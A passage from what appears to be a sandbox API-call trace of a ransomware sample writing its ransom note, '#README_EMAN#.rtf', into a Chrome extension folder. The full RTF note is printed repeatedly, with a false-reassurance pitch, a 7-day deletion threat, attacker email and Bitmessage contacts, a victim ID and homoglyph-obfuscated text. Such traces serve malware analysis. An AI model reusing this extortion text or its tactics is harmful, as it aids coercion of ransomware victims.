g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0272.352] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0272.353] CloseHandle (hObject=0x294) returned 1 [0272.353] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\#readme_eman#.rtf")) returned 0xffffffff [0272.353] GetLastError () returned 0x2 [0272.353] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0272.353] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.354] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in 